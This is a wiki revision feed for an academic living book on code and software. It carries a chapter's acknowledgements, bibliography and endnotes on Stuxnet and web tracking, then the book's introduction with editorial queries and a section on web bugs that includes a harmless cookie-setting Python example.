&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm has the ability to transfer itself without any human action. It does this by exploiting the file or information transport features of a computer, such as its networking setup, enabling it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner was then able to match this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad – background images accidentally photographed on computers used by the president – confirming the cascade structure, centrifuge layout and enrichment process: see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although it is suspected that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some suggestions that this link may be spurious. Cryptome (2010), for instance, argues that it 'may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit'. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing on the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4692</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4692"/>
		<updated>2012-04-18T12:18:21Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy issues, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
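&lt;br /&gt;
The underlying mechanism is simple enough to sketch. The following Python fragment shows the kind of ‘Set-Cookie’ header a server emits in order to register state on the client, using the standard http.cookies module; the cookie name and value are illustrative. &lt;br /&gt;
&amp;lt;pre&amp;gt;
from http.cookies import SimpleCookie

# the server sets a small piece of state; the browser then returns it
# with every subsequent request to the same domain until it expires
jar = SimpleCookie()
jar['uid'] = 'a1b2c3'
jar['uid']['max-age'] = 60 * 60 * 24 * 365   # persist for a year

print(jar.output())
# prints: Set-Cookie: uid=a1b2c3; Max-Age=31536000
&amp;lt;/pre&amp;gt; &lt;br /&gt;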
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
